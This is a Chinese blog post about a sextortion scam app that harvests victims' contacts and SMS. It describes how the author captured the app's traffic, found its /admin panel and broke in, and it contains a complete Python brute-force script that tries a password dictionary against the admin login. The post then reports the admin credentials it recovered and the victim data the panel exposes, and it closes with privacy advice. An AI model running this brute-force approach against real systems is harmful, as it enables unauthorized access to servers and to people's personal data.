原文链接

为啥总是不通过啊  能把原因写的清楚点吗  或者是具体到那几行??

​事情是这样的

前两天在某求职软件随便发了一条动态

过了一会就收到了一个女生发来的一条消息

聊了没几句就引导我加她QQ

大概是这个样子的

搜索了一下级别不是很高才一个太阳

空间里没有说说,相册

访问量也很低才两位数

一看就知道是小号

这些人聊天挺有套路的

前几天会和你正常聊天

在往后就会问你最近的感情状况怎么样

然后就他们就切入正题了

问你:"要不要来点刺激的?"

"bu chuan yi fu的那种聊天"

有些人可能处于某种状态就直接答应了

然后她就会给你发一个app的安装包

有的可能还会给你个邀请码什么的

放上几个吸引人的背景图

大概就像下面这样

登录的时候是要用手机号和邀请码登录

登录成功大概是这个样子

这些一看就知道肯定是假数据

根本不用信

进入软件时还会让你允许授权

获取手机通讯录, 相册, 短信等权限

不允许的话还不准使用

获取这些东西才是让你乖乖掏钱的利刃

然后重点来啦

好友那边会给你发几条"带颜色"的视频

用来诱导你"心潮澎湃"

然后会邀请你开视频

让你先露个脸

然后再让你拍某些私 密地方

这个时候有些人早就放飞自我了

也浑然不知即将到来的"灾难"

对方大概会在一分钟左右挂断视频

因为他的阴谋已经得逞了

过会你就会收到一些勒索消息

转过来多少多少钱

不然就把刚刚的那些视频发给你通讯录的所有人

这个时候大多数人应该会选择破财 ,消灾

也不会报_警

以免影响自己的声誉,面子

这些人正是抓住了人的这一特点加以"利用"使之成为赚钱的渠道

而这却是一个无底洞

由于他们获取到了你的短信信息

你的余额有些他们也能看到

直到把你余_额"榨干"才会罢休

出于好奇对该app进行了抓_包

获取到了请求的域名

根据域名猜测常用后台管理网址

一下就成功了

网址后面加个"admin"

例:www.xxx.com/admin

就像这样成功进到登录界面

试了几下sql注_,入发现没有效果

尝试了几个常见的弱密码之后也没有反应

就从网上找来了一堆弱密码集合

去重之后大概有1100多个密码

下图为部分密码

这个后台并没有验证码

爆_,破起来相对简单

然后就开始编写程序开始爆_,.破

程序大概代码是这样的

import requests, json, time, re
path = __file__
# 获取当前文件名用于生成日志
file_name = re.findall(r'[\.\\]?(\w+)\.py$', path)
if len(file_name):file_name = file_name[0]
else:file_name = 'null'
# 密码字典
f=open("dict.txt")
# 执行次数
c = 1;
# 空行次数
i = 1;
while 1:pwd = f.readline().strip()print('\n密码:', pwd, ' 尝试次数: ',c)c = c+1if not pwd:print('字典已比对完',pwd)i = i+1if (i > 6):break# 接口地址 xxx换成指定域名url = "https://www.xxx.com/admin/privilege.php?act=signin&type=password"# 消息头数据headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8','Accept-Encoding': 'gzip, deflate','Accept-Language': 'zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7','Cache-Control': 'max-age=0','Connection': 'keep-alive','Content-Length': '30','Content-Type': 'application/x-www-form-urlencoded','Cookie': 'PHPSESSID=2uj013123rsdfsdftmik62','Host': 'www.xxx.com','Origin': 'https://www.xxx.com','Referer': 'https://www.xxx.com/admin/privilege.php?act=signin&type=password','Upgrade-Insecure-Requests': '1','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36',}# 默认账号以及测试密码payload = {'username':'admin','password':pwd,'dsc_token':'ca2ad6e8b7c89039c3370d314f2a32ba',}# 当前时间this_time =  '\n' + time.strftime("%Y-%m-%d %H:%M:%S" ,  time.localtime() ) + '    '# verify = False 忽略SSH 验证 requests.packages.urllib3.disable_warnings()try:r = requests.post(url, payload, headers=headers,verify=False)except Exception as e:print('请求错误')file_handle=open(file_name + 'response_error.txt',mode='a+',encoding='utf-8')file_handle.write(this_time + ' 请求错误 请求的密码是:  ' +  pwd )file_handle.close();print(e)time.sleep(1)continue;# code码code = r.status_code# print(code)if (code != 200):print('响应错误')file_handle=open(file_name + 'request_log.txt',mode='a+',encoding='utf-8')file_handle.write(this_time + ' 响应错误 密码是:  ' +  pwd )file_handle.close();continue;# print(r.text)response_content = r.text# result = re.findall('false', response_content)# if len(result):if response_content == 'false':print('error 密码错误')else:print('破解成功，密码为',pwd, '\n')file_handle=open(file_name + 'request_log.txt',mode='a+',encoding='utf-8')file_handle.write( this_time + ' 密码是:  ' +  pwd)file_handle.close();breaktime.sleep(1)

由于主要是为了实现功能+对Python不熟悉

对代码的可读性,方法封装未做处理请各位理解^_^

经过几十分钟的调试终于可以运行了

运行结果大概是这个样子的

等了几分钟破_,解了大概1000多次后

成功找到密码为: rty456, 账号是: admin

用的是默认的账号

然后在登录界面把账号和刚刚的密码输上去点了一下登录

成功进入到后台

后台功能比较简单

主要有用户手机号以及用户的通讯录和短信信息

可以提供下载

这样就有可能能窃_取,短信信息以及银行卡信息了

这些用户都是在好奇心的驱使下一步一步掉进陷阱

仅仅一天就有将近20人上钩

这个网站刚刚成立十几天就已经有几百人被坑

这点相对于整个互联网还只是冰山一角不值一提

但却时刻影响着我们的隐私安全

在平时使用手机或电脑时

尽量不访问未知网站,不安装来源信息不明的软件

软件获取授权信息时要仔细斟酌

尽量把应用权限控制到最小

隐_私-照片,音频,视频可以进行加密处理减少外泄的可能性

【视频聊天】背后的秘密相关推荐

1. 微信团队分享：微信每日亿次实时音视频聊天背后的技术解密

   本文内容整理自腾讯专家研究员 & 微信视频技术负责人谷沉沉在 2017 ArchSummit 全球架构师峰会上的技术分享. 1.前言 2012 年 7 月,微信 4.2 版本首次加入了实时音视 ...

2. 7 Papers Radios | 机器人「造孩子」；谷歌裸眼3D全息视频聊天技术公开

   点击上方"3D视觉工坊",选择"星标" 干货第一时间送达 来源丨机器之心 作者丨杜伟.楚航.罗若天 本周重要论文包括能「造孩子」的机器人以及谷歌公开的裸眼3D全 ...

3. 腾讯技术分享：微信小程序音视频技术背后的故事

   1.引言 微信小程序自2017年1月9日正式对外公布以来,越来越受到关注和重视,小程序上的各种技术体验也越来越丰富.而音视频作为高速移动网络时代下增长最快的应用形式之一,在微信小程序中也当然不能错过. ...

4. 实时音视频聊天中超低延迟架构的思考与技术实践

   1.前言 从直播在线上抓娃娃,不断变化的是玩法的创新,始终不变的是对超低延迟的苛求.实时架构是超低延迟的基石,如何在信源编码.信道编码和实时传输整个链条来构建实时架构?在实时架构的基础之上,如果通过优 ...

5. CC讲坛-大脑疾病背后的秘密-许执恒

   <CC讲坛>第二十期于2017年7月27日在北京东方梅地亚中心M剧场举行,中国科学院遗传与发育生物学研究所研究员许执恒出席并进行题为<大脑疾病背后的秘密>的演讲. 胚胎时期大脑 ...

6. 使用Python套接字编程的视频聊天应用

   在这场流行病中,我们正经历着大量的公司转向在线平台,并在家里开始伟大的倡议工作,但如果我们不能与团队联系起来,这怎么可能呢? 因此,为了解决这一挑战,公司开始使用软件,允许他们在摄像头和其他资源的帮助 ...

7. 网络安全- 专访丨互联网安全城市巡回赛冠军肖策：“大满贯”背后的秘密

   导语:你所看到的让人欣羡的荣耀时刻,是背后无数个日夜的辛苦付出! 在2019互联网安全城市巡回赛·西安站中,有一个白帽子拿下了8家大满贯,这位大神就是[火石计划杯]精英白帽挑战赛的第一名:Reckfu ...

8. Facebook将推出“虚拟约会”功能视频聊天室

   原文 https://mparticle.uc.cn/article.html?uc_param_str=frdnsnpfvecpntnwprdssskt&wm_aid=771214c9fdc ...

9. linux与windows的语音视频聊天?不容易啊

   相当一段时间都在关注voip的事情,浪费了不少时间,现在把现阶段的结论写下来. 协议 目 前拥有voip功能的IM种类繁多,区分它们的主要是协议.msn, qq, Gtalk, skype, weng ...

10. 不能见面的爱情——用视频聊天维持的亲密关系是怎样的

    关注"心仪脑"查看更多脑科学知识 关键词:文献综述.亲密关系 许多伴侣一生中大部分时间是处于异地恋(LDR)状态,他们因学业.工作等环境需求而被迫在地理位置上分离,尤其现在新冠疫情 ...

最新文章

1. c语言作用域有哪两种变量,2017年计算机二级C语言字考点归纳：变量的存储类别、作用域及生存期...
2. DB扩展名的数据库文件怎么打开：两种db数据库的打开方式
3. windows下tensorflow安装
4. PHP的http_build_query
5. 浅析row_number()函数【HQL】
6. java笔试题_Java面试才到笔试就没有然后了？快来签收，高频笔试57题及解答
7. 让模块支持“导入”“导出”功能
8. 判别模型、生成模型与朴素贝叶斯方法
9. Python 装饰器详解（下）
10. CSS3实现的响应式字体：自适应视图窗口大小的新单位
11. c语言求两个有序表合成差集代码,两个有序链表求差集，合并为一个有序链表...
12. 这样做动画交互，一点都不费力
13. View相关知识学习总结
14. c语言 期末,c语言期末 求助
15. Word多级标题设置和自动生成目录
16. 机器人动力学（牛顿欧拉推导）
17. html网页制作代码大全：庆余年——电影网站7页，不包含js 有登陆注册，表格 table布局 ，有的登录注册页面，内嵌 css
18. thought work java,ThoughtWorks
19. 手机服务器怎么维护,手机维护远程服务器
20. LeetCode 1134.阿姆斯特朗数 每日一题

热门文章

1. Flash Switcher（二） - 极致书签管理
2. vue 导出word文档，支持表格和图片
3. drop box java_使用Dropbox Java API将文件上载到Dropbox
4. Tomcat基本使用以及项目部署。
5. CSDN是怎么实现用户签到，统计签到次数，连续签到天数等功能微服务的
6. c语言一维数组字符串数组初始化,一维数组的定义、初始化和引用
7. KubeCon Keynote演讲：Kubernetes如何赋能可再生能源产业提升10倍效率
8. opencv 开操作-闭操作 礼帽-黑帽作用
9. 有效的沟通，如忍者的最后一击！
10. python快速爬虫视频_“python怎么快速爬虫视频“python 爬网页视频教程